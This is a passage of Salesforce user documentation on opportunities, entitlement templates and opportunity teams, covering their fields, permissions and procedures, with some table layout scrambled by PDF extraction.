Available in: Enterprise, Unlimited, and Developer Editions with the Service Cloud

User Permissions Needed

“Read” on productsTo view entitlement templates on products:

“Edit” on productsTo add or remove entitlement templates to/from products:

The Entitlement Templates related list displays a product's applicable entitlement templates. Entitlement templates are
predefined terms of customer support that you can quickly add to products. For example, you can create entitlement templates
for Web or phone support so that users can easily add entitlements to products offered to customers.

Administrators determine an Entitlement Template related list's availability and content. The following options and information
appear by default:

Add Entitlement Template

Click this button to add entitlement template(s) to the product.

To search for entitlement templates, enter a name, or part of a name, in the text entry field and click Go!. Check the
boxes next to the templates you want to add to the product and click Insert Selected. Click Done to add the selected
templates.
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Action

The actions you can perform on the entitlement template. For example, Click Remove to remove an entitlement template
from the product.

Entitlement Template

The name of the template. Click to view the template's details.

Created By

The user who created the entitlement template.

BUILDING YOUR PIPELINE WITH OPPORTUNITIES

Opportunities Overview
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

Opportunities are the sales and pending deals that you want to track. By adding opportunities, you are also building your
“pipeline,” which will contribute to your forecast. You can also link opportunities to campaigns to help measure the ROI of
your marketing programs. In addition, you can create quotes, which show proposed prices for products and services, from an
opportunity.

The Opportunities tab displays a home page that lets you quickly create and locate opportunities. You can also sort and filter
opportunities using standard and custom list views. In addition, this tab lets you view and edit detailed information on each
opportunity to which you have access.

See Also:
Opportunities Home
Viewing Opportunity Lists
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Opportunities Home
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Read” on opportunitiesTo view Opportunities tab:

“Read” on opportunitiesTo view opportunities:

“Create” on opportunitiesTo create opportunities

Clicking on the Opportunities tab displays the opportunities home page. From this page you can:

• Show a filtered list of opportunities using a predefined list from View or by creating a custom view.

• See a list of your most recently viewed, created, or modified opportunities in Recent Opportunities. Depending on the
number of opportunities, toggle Show 25 items and Show 10 items to change the number of displayed items. The displayed
fields are determined by the Opportunities Search Layout defined by your administrator and by your field-level security
settings (available in Enterprise, Unlimited, and Developer Editions only).

DescriptionRecent Opportunities Choice

The last 10 or 25 opportunities you viewed, with the most
recently viewed opportunity listed first. This list is derived

Recently Viewed

from your recent items and includes records owned by you
and other users.

The last 10 or 25 opportunities you created, with the most
recently created opportunity listed first. This list only
includes records owned by you.

Recently Created

The last 10 or 25 opportunities you updated, with the most
recently updated opportunity listed first. This list only
includes records owned by you.

Recently Modified

• Click an opportunity name in Recent Opportunities to open the opportunity detail page.

• Create a new opportunity. Click New in Recent Opportunities or enter information in Quick Create on the sidebar.

• Click a report name in Reports to jump to that report or click Go to Reports to jump to the Reports tab. In opportunity
reports, you can filter opportunities by the opportunity teams in which you are a member.

• Click Run Report in Quarterly Summary to view a quarterly opportunity summary.

• If opportunities are shared with external contacts via Salesforce to Salesforce, choose a list view from Opportunities from
Connections to view opportunities that your business partners have shared with you.

• Use opportunity tools.
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◊ Choose to add, remove, or reassign a team member.

◊ Leverage Salesforce AppExchange Sales Methodology partners to use their sales methodology, sales process, and sales
procedures with Salesforce data.

See Also:
Opportunities Overview
Using Opportunities

Viewing Opportunity Lists
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Read” on opportunitiesTo view opportunity lists:

“Create” on opportunitiesTo create opportunities:

The opportunities list page displays a list of opportunities in your current view. To show a filtered list of items, select a
predefined list from the View drop-down list, or click Create New View to define your own custom views. To edit or delete
any view you created, select it from the View drop-down list and click Edit.

• Click an opportunity name to view the detail.

• Click Edit or Del to edit or delete an opportunity.

• If Chatter is enabled, click  or  to follow or stop following an opportunity in your Chatter feed.
• To create an opportunity, either click New Opportunity at the top of the list, or select Opportunity from the Create New

drop-down list in the sidebar.
• In a custom list view, you can filter opportunity lists by the opportunity teams to which you belong. When creating or

editing a custom list view for opportunities, select the My Opportunity Teams filter.

Sorting List Views

Click any column heading to sort in ascending or descending order using that column’s information.

At the top of the list, click a letter to display the contents of the sorted column that begin with that character.

The alphabetic navigator won’t t appear if the list view doesn’t support column sorting. If your language or the sorted column
doesn’t support alphabetic sorting, the navigator is disabled. For example, you can’t click letters to sort on date fields.
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Note:  In Enterprise, Unlimited, and Developer Edition organizations, you can grant additional access to your
opportunities beyond what the sharing model allows. See Sharing Opportunities. In Professional Edition organizations,
to allow additional access to your opportunities, you can share the account associated with the opportunity. See Sharing
Accounts.

Using Opportunities
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Read” on opportunitiesTo view opportunities:

“Edit” on opportunitiesTo change opportunities:

Opportunities track your sales and pending deals.

• View and edit opportunity details from the Opportunities home or list pages.

• Find opportunity-related information (for example, open activities) from the related lists on an opportunity.

• View opportunity updates and comments (Chatter).

• Link opportunities to campaigns to help measure marketing program ROI (Campaign Influence). To do this manually,
click Add Campaign in the Campaign Influence related list on the opportunity.

• Create quotes to show proposed prices for products and services.

See Also:
Scheduling Opportunity Update Reminders
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Viewing and Editing Opportunity Details
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Read” on opportunitiesTo view opportunities:

“Edit” on opportunitiesTo change opportunities:

Once you have located an opportunity on the Opportunities home or list pages, click the opportunity name to display detailed
information.

• Use inline editing to edit fields directly on the detail page. If inline editing isn’t enabled, contact your administrator.

• To display the page in edit mode, click Edit, make your changes, and click Save.

• To save the current opportunity and create another one, click Save & New.

• To open a printable display of the record details, in the top-right corner of the page, click Printable View.

Note:

When you set an open opportunity's Stage to a type of “Closed/Won,” the Close Date is set to the current date.

See Also:
Searching for Opportunities
Opportunity Fields
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Finding Opportunity-Related Information (Related Lists)
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Read” on opportunitiesTo view opportunities:

“Edit” on opportunitiesTo change opportunities:

Related lists, such as Open Activities, display information related to an opportunity.

• Hover over the links at the top of a detail page to display the corresponding related list and its records. If Chatter is enabled,
hover links display below the feed. An interactive overlay allows you to quickly view and manage the related list items.
Click a hover link to jump to the content of the related list. If hover links are not enabled, contact your Salesforce
administrator.

• If hover details are enabled, hover over any lookup field on the detail page to view key information about a record before
clicking into that record’s detail page.

• To directly add new items, click New (or the equivalent button) at the top of a related list. For example, to add a new
contact to the Contacts related list, click New Contact.

• To change the number of records shown for related lists, click View More below a related list, or click fewer or more at
the bottom of the page.

Viewing Related Lists

The related lists you see are determined by your:

• Personal customization
• Administrator's page layout customizations
• Permissions to view related data
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Opportunity Field History
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Read” on opportunitiesTo view opportunities:

The Opportunity Field History related list of an opportunity detail page tracks the changes to the opportunity. Any time a
user modifies any of the standard or custom fields whose history is set to be tracked on the opportunity, a new entry is added
to the Opportunity Field History related list. All entries include the date, time, nature of the change, and who made the
change. Modifications to the related lists on the opportunity are not tracked in the opportunity field history. You cannot
customize which opportunity fields are tracked in the opportunities’ Stage History related list; however, you can choose which
opportunity fields are tracked in the Opportunity Field History related list.

Note:

• Changes to the Amount and Quantity fields on opportunities are tracked even when the field is updated as the
result of a change to an opportunity’s products or schedules.

• For information on tracking changes in opportunity status, see Stage History.

See Also:
Opportunities Overview
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Stage History
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Read” on opportunitiesTo view opportunity stage history:

The Stage History related list of an opportunity detail page tracks the changes in status for that opportunity. Any time you
change the Amount, Probability, Stage, or Close Date for the opportunity, a new entry is added to the list with the
name of the person that made the change and a date stamp.

For information on tracking changes to any standard or custom field on an opportunity, see Opportunity Field History.

See Also:
Opportunities Overview

Products Related List
Available in: Professional, Enterprise, Unlimited, and Developer Editions

The Products related list of an opportunity detail page lists the products included on that opportunity. If the opportunity is
synced to a quote, products in the list are updated whenever a change is made to the quote's line items, and vice versa.

Your administrator can customize the product edit and detail pages that you see when you select a product on an opportunity
from Setup by clicking Customize > Opportunities > Opportunity Products > Page Layouts.

See Also:
Choosing a Price Book for an Opportunity or Quote
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Quotes Related List
Available in: Professional, Enterprise, Unlimited, and Developer Editions

The Quotes related list of an opportunity detail page lists the quotes created for that opportunity and identifies which quote
is synced, if any. Your administrator can customize the Quote edit and detail pages that you see when you select a quote from
Setup by clicking Customize > Quotes > Quote Lines > Page Layouts.

See Also:
Quotes Overview
Syncing Quotes and Opportunities

Opportunity Forecasts
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View All Forecasts”To view forecasts of other users:

“Override Forecasts”To override your forecast:

The Opportunity Forecasts related list is available on the opportunity detail page if your organization uses customizable
forecasting. It lists the forecast overrides for the selected opportunity. A forecast override is an amount that more accurately
represents your forecasted sales.

1. In the Opportunity Forecasts related list, view a snapshot of the overrides made on that opportunity.
2. Click Edit to change the overrides. See Overriding Customizable Forecasts for instructions on overriding opportunity

forecast amounts.
3. If your organization uses territory management, the territory to which the opportunity is assigned displays in the Territory

drop-down list.

If you are a forecast manager for multiple territories, the drop-down list shows the territories from which you can override
the opportunity. Choose a value and click Edit to override the opportunity from the desired territory.

See Also:
Customizable Forecasting Overview
Territory Management Overview
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Changing the Territory of an Opportunity
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on opportunitiesTo change an opportunity's territory:

If you have edit access to an opportunity, you can change the territory that is associated with the opportunity:

1. On the opportunity detail page, click Change next to the Territory field.
2. Choose a territory from the Opportunity Territory drop-down list.

The drop-down list shows:

• Territories where both the opportunity owner and the account on the opportunity are assigned to the territory.
• Territories to which you have administrative access that are also associated with the account on the opportunity.
• Territories to which you have administrative access that are above the account on the opportunity in the territory

hierarchy.

3. Click Save to finish and return to the opportunity detail page.

See Also:
Territory Management Overview

Creating Opportunities
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Read” on opportunitiesTo view opportunities:

“Create” on opportunitiesTo create opportunities:

1. Do one of the following.

• Select Opportunity from the Create New drop-down list in the sidebar.
• Click New next to Recent Opportunities on the opportunities home page.
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• Go to Quick Create in the sidebar of the opportunities home page. (Quick Create must be enabled by your administrator.)
• To associate an opportunity with an account or contact, view the existing account or contact, and select Opportunity

from the Create New drop-down list in the sidebar. You must have at least read access to the account or contact to
associate an opportunity with it. When you create an opportunity from a contact detail page, that contact is automatically
listed as the primary contact in the Contact Roles related list of the opportunity.

2. Enter the opportunity information.

Note:  When team selling and revenue splits are enabled, you’re automatically added to the opportunity team and
initially assigned 100% of the split.

3. If your organization uses multiple currencies, your opportunity amounts are initially shown in your personal currency.
Change the Opportunity Currency picklist to track the sales revenue in another currency.

4. Click Save when you are finished, or click Save & New to save the current opportunity and add another. If enabled for
your organization, click Save & Add Product to save the new opportunity and add a product.

If your organization uses territory management, opportunities that you create are automatically assigned a territory when both
of the following conditions are met.

• You belong to or have edit privileges on the same territory as the account on the opportunity.

• You have no other territories in common with that account.

For example, if you are in the territories Berkeley and San Francisco and the account is in the territories Portland, San Francisco,
and Seattle, the opportunity will be assigned to the San Francisco territory.

If your organization uses divisions, the division of a new opportunity is automatically set to the division of the related account.

Note:  In Professional, Enterprise, Unlimited, and Developer Editions, opportunities you create are automatically
given the forecast category that corresponds to the opportunity stage you assign. Your administrator correlates
opportunity stages and forecast categories when editing the Stage picklist values.

If the opportunity is set to close in a given month, as determined by the Close Date, the opportunity is automatically
added to the forecast for that particular month, unless you assign it the Omitted category while editing the forecast.
See Displaying and Editing Forecasts.

See Also:
Opportunity Fields
Cloning Opportunities
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Cloning Opportunities
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Read” on opportunitiesTo view opportunities:

“Create” on opportunitiesTo clone opportunities:

The Clone button on an opportunity quickly creates a new opportunity with the same information as the existing opportunity,
for example, when you need to add multiple opportunities for the same account.

If the opportunity has an associated opportunity team, the team is not carried to the cloned opportunity. You must add an
opportunity team to the cloned opportunity if required.

Cloning an opportunity varies if products are involved:

• If the opportunity does not have any associated products, click Clone on the opportunity to clone it.

• If the opportunity has associated products and your organization requires products on opportunities, click Clone to clone
the opportunity and the associated products.

• If the opportunity has associated products and your organization does not require products on opportunities, select Clone
with products from the Clone drop-down button to clone the opportunity and the associated products. Alternatively,
select Clone without products to clone the opportunity without including the associated products.

Enter or change any information for the new opportunity, and click Save.

Note:  If you have read-only access to a field, the value of that field is not carried over to the cloned record.

See Also:
Opportunity Fields
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Sharing Opportunities
Available in: Enterprise, Unlimited, and Developer Editions

Your administrator defines the organization sharing model as well as your organization's default opportunity access levels for
territories. However, you can extend sharing privileges for your opportunities individually. You can use opportunity sharing
to increase access to your opportunities; you cannot restrict access below your organization’s default access levels.

To view and manage sharing details, click Sharing on the opportunity detail page. The Sharing Detail page lists the users,
groups, roles, and territories that have sharing access to the opportunity. On this page, you can do any of the following:

• To show a filtered list of items, select a predefined list from the View drop-down list, or click Create New View to define
your own custom views. To edit or delete any view you created, select it from the View drop-down list and click Edit.

• Click Add to grant access to the record for other users, groups, roles, or territories.

Note:  To share an opportunity with another user, that user must have the “Read” permission on opportunities.

• Click Expand List to view all users that have access to the record.

• For manual sharing rules that you created, click Edit or Del next to an item in the list to edit or delete the access level.

Opportunity Fields
The available fields vary according to which Salesforce Edition you have.

An opportunity has the following fields, listed in alphabetical order. Depending on your page layout and field-level security
settings, some fields may not be visible or editable.

DescriptionField

Name of account that opportunity is linked to. You can enter
the account name, or select the account using the lookup icon.

If you change the account for an opportunity that has partners,
all partners are deleted from the Partners related list.

Account Name

Estimated total sale amount. For organizations using multiple
currencies, the amount is shown in your personal currency by

Amount

default. Change the Opportunity Currency picklist to
track the amount in another currency.

For opportunities with products, the amount is the sum of the
related products. You cannot directly edit the amount unless
the opportunity has no products. To change the amount for
an opportunity that contains products, edit the sales price or
quantity of the related products.
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DescriptionField

If you change the price book for an opportunity that has
products, all products are deleted from the Products related
list, but the value in the opportunity's Amount field remains.

Date when you plan to close the opportunity. You can enter
a date, or choose a date from the calendar that displays when
you put your cursor in the field.

Opportunities with a Close Date in a given month will tally
in the forecast for that month, unless you assign them to the
Omitted category while editing the forecast.

Close Date

When you set an open opportunity's Stage to a type of
“Closed/Won,” the Close Date is set to the current date.

User who created the opportunity including creation date and
time. (Read only)

Created By

Listing of custom links for opportunities as set up by your
administrator.

Custom Links

Description of the opportunity. Up to 32KB of data are
allowed. Only the first 255 characters display in reports.

Description

Calculated revenue based on the Amount and Probability
fields.

Expected Revenue

Forecast category name that is displayed in reports, opportunity
detail and edit pages, opportunity searches, and opportunity

Forecast Category

list views. The setting for an opportunity is tied to its Stage.
For more information on forecast categories, see  Working
with Forecast Categories  on page 1199.

Source of the opportunity, for example, Advertisement,
Partner, or Web. Entry is selected from a picklist of available

Lead Source

values, which are set by an administrator. Each picklist value
can have up to 40 characters.

User who last changed the opportunity fields, including
modification date and time. This does not track changes made
to any of the related list items on the opportunity. (Read only)

Modified By

Description of next task in closing opportunity. Up to 255
characters are allowed in this field.

Next Step

The default currency for all currency amount fields in the
opportunity. Amounts are displayed in the opportunity

Opportunity Currency

currency, and are also converted to the user’s personal currency.
Available only for organizations that use multiple currencies.

For opportunities with products, the currency is tied to the
currency of the associated price book. You cannot directly edit
this field unless you first delete the products.
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DescriptionField

Division to which the opportunity belongs. This value is
automatically inherited from the related account.

Available only in organizations that use divisions to segment
their data.

Opportunity Division

Name of the opportunity, for example, Acme.com - Office
Equipment Order. Up to 120 characters are allowed in this
field.

Opportunity Name

Assigned owner of opportunity. Not available in Personal
Edition.

Opportunity Owner

Name of the field that determines what picklist values are
available for the record. The record type may be associated

Opportunity Record Type

with a sales process. Available in Enterprise, Unlimited, and
Developer Editions.

Read-only field that indicates the opportunity is owned by a
partner user.

Partner Account

Name of the campaign responsible for generating the
opportunity.

When you click the lookup icon for the empty field, the dialog
shows the first 100 active campaigns. Enter search terms to
find other records.

Primary Campaign Source

For opportunities created during lead conversion, this field is
automatically filled in with the campaign name from the lead.
If the lead has multiple associated campaigns, the campaign
with the most recently updated member status is inserted into
the opportunity.

For opportunities with multiple influential campaigns, click
Edit next the primary campaign in the Campaign Influence
related list on the opportunity detail page and select the
Primary Campaign Source checkbox. The campaign will
display in the Primary Campaign Source field on the
opportunity.

Indicates that the opportunity is private. Only the record
owner, users above that role in the hierarchy, and

Private

administrators can view, edit, and report on private
opportunities. Not available in Group or Personal Editions.
Private opportunities do not trigger Big Deal Alerts or
workflow rules. Private opportunities count towards your
forecasts only if you have customizable forecasting.

Note:  When you mark opportunities Private, any
opportunity teams, opportunity splits, and sharing
are removed.
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DescriptionField

Likelihood that opportunity will close, stated as a percentage.

The Probability value is always updated by a change in
the Stage value, even if Probability is marked as read

Probability

only on your page layout. Users with access to edit this field
can override the value.

Total of all Quantity field values for all products in the
Products related list if the opportunity has products. General
use field if the opportunity does not have products.

Quantity

Current stage of opportunity based on selections you make
from a predefined list, for example, Prospect or Proposal.

Stage

Entry is selected from a picklist of up to 100 available values,
which are set by an administrator. Each picklist value can have
up to 40 characters.

Your administrator correlates the values in this picklist with
Forecast Category values that determine how the opportunity
contributes to your forecast.

When you set an open opportunity's Stage to a type of
“Closed/Won,” the Close Date is set to the current date.

The quote that is synced to the opportunity. Only one quote
can sync to the opportunity at a time.

Synced Quote

Territory with which the opportunity is associated. Only
available if your organization has territory management. See
Changing the Territory of an Opportunity.

Territory

Type of opportunity, for example, Existing Business or New
Business. Entry is selected from a picklist of available values,

Type

which are set by an administrator. Each picklist value can have
up to 40 characters.

Opportunity Product Fields

DescriptionField

Indicates whether the price book entry (product and list price)
is active and can be added to an opportunity or quote.

Active

Name of the user who created the product.Created By

Close date of a particular opportunity product.Date

The discount for the product as a percentage.Discount

User who last changed the opportunity product fields. (Read
only)

Last Modified By

Text to distinguish this opportunity product from another.Line Description
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DescriptionField

Price of the product within the price book including currency.List Price

Name of the opportunity for this opportunity product.Opportunity

Item listed in the Products related list on an opportunity.Product

Title for the product.Product Name

The number of units for the opportunity product.Quantity

Price for the products in the opportunity product.Sales Price

The difference between standard and discounted pricing.
Converted currency amounts when the opportunity's currency
is different from the user's currency.

Subtotal

Sum of all the product amounts for this opportunity product.Total Price

Deleting Opportunities
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Read” on opportunitiesTo view opportunities:

“Delete” on opportunitiesTo delete opportunities:

To delete an opportunity, click Del next to the opportunity on the opportunities list page or in the Opportunities related list
of an account or contact. You can also delete an opportunity by clicking Delete on the opportunity detail page.

When you delete an opportunity, all related notes, attachments, quotes, quote line items, quote PDFs, events and tasks, partner
relationships, competitor strengths/weaknesses, contact roles, and stage history are deleted. Associated contacts and accounts
are not deleted with the opportunity. The deleted opportunity is moved to the Recycle Bin. If you undelete the opportunity,
any related items are also restored.

Note:  You can delete an opportunity if you are an administrator, the opportunity owner, or a user above the opportunity
owner in the organization role hierarchy, and you have the “Delete” permission on opportunities.
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Searching for Opportunities
Available in: All Editions that signed up prior to Summer '09

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions that signed up during or after Summer
'09

Not Available in Database.com

User Permissions Needed

“Read” on opportunitiesTo view opportunities:

1. Enter your search terms in the sidebar or header search box.
2. Click Search.
3. From the search results, click an item to open it or click Edit, if available.

You can also create an opportunity list view to find opportunities that match specific criteria.

See Also:
Finding Similar Opportunities

Finding Similar Opportunities
Available in: Enterprise, Unlimited, Developer Editions

User Permissions Needed

“Read” on opportunitiesTo find and bookmark similar opportunities:

You can create bookmarks for Closed/Won opportunities that are similar to your current deal so you can quickly access useful
information, such as previous notes, contacts, or salespeople. The records that you bookmark are saved to the Similar
Opportunities related list.

When you search for similar opportunities, Salesforce looks for records in the Closed/Won stage that share one or more fields
or related lists with the current opportunity. The search criteria for your organization is pre-determined by your administrator.
The search finds a maximum of 10,000 opportunities with close dates in a three-month period and displays up to 300 of the
records that best match the search criteria. The results are ranked by the number of matching fields.

1. On the opportunity's detail page, click Find in the Similar Opportunities related list.
You see a list of similar opportunities that closed in the past three months.

2. Filter the search results to see different records.
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• Select a different range from the Close Date Within dropdown to view records that closed in a different three-month
period.

• Select one or more fields in the Match Criteria sidebar to filter the results. For example, select the account name to
only see opportunities associated with that account or select the site city and country to only see opportunities from
the specified region. Deselect the match criteria to return to the original search results.

3. Look for similar opportunities that will be helpful to you.

• Hover over an opportunity name to see how the record is similar to your current deal. The matching attributes are
highlighted in the Match Criteria sidebar.

• Click an opportunity name to see more information about the record. You can only view these details if you have access
to the opportunity.

4. Select the checkboxes next to the opportunities that you'd like to add to the Similar Opportunities related list and click
Bookmark. To choose all opportunities on the page, select the checkbox in the header row.

See Also:
Enabling and Configuring Similar Opportunities
Understanding Similar Opportunities Searches

Scheduling Opportunity Update Reminders
Available in: Professional, Enterprise, Unlimited, and Developer Editions

Once opportunity update reminders are enabled for your organization, any user who has direct reports can schedule them.

To schedule an opportunity update reminder:

1. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup
or My Settings—whichever one appears.

2. From the left side of the page, click Email > My Update Reminder.
3. Check Active if you want reminders to start after you save the settings.
4. Enter a name and address for the sender of the reminders.
5. Choose a recipients option.
6. Enter any other recipients in the CC field. Separate additional email addresses with a commas, semi-colons, spaces, or new

lines.
7. Enter a subject and message to be included in the email reminders.
8. Select a schedule frequency.
9. Select Include Past Due Opportunities to include all open opportunities that have a closing date within 90 days

before the specified Close Date. For example, suppose your organization uses a normal fiscal year and the current quarter
started on 4/1/2012. You configure update reminders for opportunities closing in the current quarter and then select
Include Past Due Opportunities. When the update reminder is sent on 6/15, it includes all opportunities from
4/1 to 6/15. It also includes open opportunities with a closing date between 1/2 and 4/1 (there are 91 days in Q1).

10. Choose a Close Date to include opportunities with dates within that range.
11. Select the fields to include in the email reminders.
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DescriptionField

Most recent login date of the opportunity ownerLast Login Date

Total number of opportunities in the report# of Open Opportunities

Total number of opportunities that have not been updated
in 30 days

# Not Updated in Last 30 Days

Total of all opportunity amounts in reportOpen Opportunity Amount

Total closed amount for all opportunities in report.

If your organization uses multiple currencies, this amount
is converted to the user's currency. If your organization uses

Total Closed Amount

advanced currency management, the conversion is done using
dated exchange rates.

Most recent date the opportunity owner submitted a forecast.

If your organization uses multiple currencies, this amount
is converted to the user's currency. If your organization uses

Last Update Date

advanced currency management, the conversion is done using
dated exchange rates.

From the forecast.

See Forecast Fields on page 1216.

Forecast Amount

If your organization uses multiple currencies, this amount
will be converted to the user's currency using the standard
conversion rate.

This field is not available to organizations using customizable
forecasting. For more information, see Do I Have
Customizable Forecasting? on page 1197.

From the forecast.

See Forecast Fields on page 1216. If your organization uses
multiple currencies, this amount will be converted to the
user's currency using the standard conversion rate.

Best Case Amount

This field is not available to organizations using customizable
forecasting. For more information, see Do I Have
Customizable Forecasting? on page 1197.

12. Click Save.

When there are no records in an opportunity update reminder, Salesforce does not send an email. If no email is sent for three
consecutive opportunity update reminders, the scheduled reminder is deactivated.
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TEAMING UP FOR SALES OPPORTUNITIES

Opportunity Teams Overview
Available in: Enterprise, Unlimited, and Developer Editions

An opportunity team is a set of users that normally work together on sales opportunities. A typical opportunity team might
include the account manager, the sales representative, and a pre-sales consultant.

You can set up an opportunity team for any opportunity owned by you or users below you in the role hierarchy. You can add
opportunity team members and select which role each of them will play on the opportunity (for example, “Executive Sponsor”).
Most importantly, you can specify the level of access that each team member has to your opportunity. Some team members
may need read/write access and others may just need read-only access. To add, edit, or delete opportunity team members, you
must have read/write access on the associated opportunity. You can't use opportunity teams for private opportunities, and you
can't add high-volume portal users to teams.

You can also set up a default opportunity team. Your default opportunity team should include the users that you normally
work with on your opportunities. You have the option to add your default opportunity team to all of your opportunities
automatically.

Opportunity team changes for an individual opportunity don't affect your default opportunity team or the opportunity teams
on any of your other opportunities.

In a custom list view, you can filter opportunity lists by the opportunity teams to which you belong. When creating or editing
a custom list view for opportunities, select the My Opportunity Teams filter. In opportunity reports, you can filter
opportunities by the opportunity teams in which you are a member.

Note:  Opportunity teams are not the same as account teams, although they share the same set of available team
member roles. Opportunity teams work together on opportunities, while account teams work together on accounts.

See Also:
Adding Members to an Opportunity Team
Setting Your Default Opportunity Team

Opportunity Teams List View
The opportunity teams list view displays information about opportunity team members.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

From the list view you can:
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• Click the alphabetical index links to filter your search results by first letter.

• Edit a team member.

• Delete a team member.

• Click the team member name to view member details or clone a team member.

See Also:
Opportunity Teams Overview

Adding Members to an Opportunity Team
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on opportunities

AND

Owner of opportunity record, or above owner in your
organization's role hierarchy

To add team members to an opportunity:

“Read” on the opportunityTo view an opportunity for which you're a team member:

1. Open the opportunity and navigate to the Opportunity Team related list, then click Add.
2. Enter the member’s name in the User column. If the partner portal is enabled, choose whether the member is a Partner

User or User, and then enter the member’s name.

When you add an opportunity team member, the member is automatically granted read access to the associated account.

3. Select the member’s opportunity team role.
4. Select the member’s opportunity access level. The access level can’t be less than your organization’s default opportunity

sharing access.
5. Specify values for any custom fields that your administrator has created for opportunity teams.
6. Click Save.

Tip: Run the Opportunities with Opportunity Teams report to list the opportunity team members for the opportunities
owned by you or users below you in the role hierarchy. The report also shows information about opportunities you
own and opportunity teams to which you belong, including any opportunity splits.

See Also:
Adding Members to Your Default Opportunity Team
Opportunity Team Fields
Cloning a Member of an Opportunity Team
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Editing Members of an Opportunity Team
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on opportunities

AND

Owner of opportunity record, or above owner in your
organization's role hierarchy

To edit team members:

“Read” on the opportunityTo view an opportunity for which you're a team member:

1. Open the opportunity and navigate to the Opportunity Team related list. Or open any other page to which you administrator
has added this list.

2. To update access or role information for a team member, click Edit next to the member’s name. (If there are more than
five members, click Go to list to list the entire team.)

Note:  Inactive users with assigned split percentages appear on the opportunity team, but you can edit only
split-related fields for these users. All other fields are read only.

3. Select a different access level or role. The access level can’t be less than your organization’s default opportunity sharing
access.

4. Edit values for any custom fields that your administrator has created for opportunity teams.

Important:  See Working with Custom Fields for Opportunity Teams on page 1133.

5. Click Save.
6. To view the organization-wide sharing settings for opportunities, click Display Access. These settings may allow greater

access than those specified for an opportunity team member. For example, if the organization sharing setting for opportunities
is Read/Write, it overrides a Read Only setting assigned to an individual opportunity team member.

Tip: Run the Opportunities with Opportunity Teams report to list the opportunity team members for the opportunities
owned by you or users below you in the role hierarchy. The report also shows information about opportunities you
own and opportunity teams to which you belong, including any opportunity splits.

See Also:
Opportunity Team Fields
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Cloning a Member of an Opportunity Team
You can quickly create a new member with the same information as an existing member, for example, when you want to add
multiple members to an opportunity team.

Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Create” on opportunitiesTo clone an opportunity team member:

1. View the opportunity and navigate to the Opportunity Team related list, then click the name of the opportunity team
member you want to clone.

2. Click Clone.
3. Enter or change any information for the new member, and click Save. If you have read-only access to a field, the value of

that field isn’t carried over to the cloned record.

See Also:
Working with Custom Fields for Opportunity Teams

Deleting Members from an Opportunity Team
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on opportunitiesTo remove team members:

“Read” on the opportunityTo view an opportunity for which you're a team member:

1. View the opportunity and navigate to the Opportunity Team related list. Or open any other page to which you administrator
has added this list.

2. Delete members no longer on the team. (If there are more than five members, click Go to list to list the entire team.)

If Opportunity Splits is enabled, keep these guidelines in mind.

• If the team member you want to delete is assigned a split percentage greater than zero, you must reassign the split before
you can delete the team member.
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• You can’t delete the opportunity owner from the opportunity team. If you want to remove this member from splits
calculations, either assign them a split percentage of zero, or transfer ownership of the opportunity.

See Also:
Deleting Members from Your Default Opportunity Team

Working with Custom Fields for Opportunity Teams
Available in: Enterprise, Unlimited, and Developer Editions

You can see custom fields for your opportunity teams if your administrator has defined them and added them to the relevant
page layouts.

If your administrator has defined custom fields but not added them to the Add Opportunity Team Members page, you can’t
see them when you add a new team member. However, you might see them when you edit an existing opportunity team
member by clicking Edit beside the member’s name on the Opportunity Team related list.

It’s important to remember that when you edit a member’s details, the member’s original details are overwritten. Let’s say you
add a member to the team and then edit that member’s details to specify values for all associated custom fields. Later, you
mistakenly think that the member hasn’t been added to the team, perhaps because you don’t look at the Opportunity Teams
list view, and add the member again. Because the custom fields aren’t displayed on the Add Opportunity Team Members
page, when you add the member for a second time, you can’t specify the values for these fields. In this case, the original values
that you specified for the custom fields are overwritten with a blank value.

See Also:
Adding Members to an Opportunity Team
Editing Members of an Opportunity Team

Setting Your Default Opportunity Team
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on opportunitiesTo set default opportunity team:

An opportunity team is a group of users that typically work together on opportunities. For example, the opportunity team may
include the account manager, the sales engineer, and the sales representative. Your default opportunity team should include
the users that you normally work with on the opportunities that you own. You can specify the role that each user plays on your
team and the specific access that each user should have to your opportunities.

• Adding Members to Your Default Opportunity Team
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• Editing Members in Your Default Opportunity Team

